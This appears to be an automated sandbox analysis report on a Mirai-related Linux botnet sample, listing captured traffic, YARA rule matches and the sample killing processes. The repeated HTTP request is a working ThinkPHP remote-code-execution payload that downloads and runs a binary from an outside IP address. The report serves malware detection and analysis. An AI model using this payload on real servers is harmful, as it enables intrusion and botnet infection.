Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

System Summary

Malicious sample detected (through community Yara rule)

Source: 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 761, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 797, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 799, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1389, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1633, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1809, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1983, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2048, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2069, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2102, result: successful

Source: LOAD without section mappings

Program segment: 0x100000

Source: NE8O7liu0s, type: SAMPLE	Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: 6225.1.000000000ef6297b.000000006d73a7a2.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6229.1.000000000ef6297b.000000006d73a7a2.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
Source: 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research

Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 936, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 761, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 797, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 799, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1389, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1633, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1809, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1860, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 1983, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2048, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2069, result: successful
Source: /tmp/NE8O7liu0s (PID: 6243)	SIGKILL sent: pid: 2096, result: successful
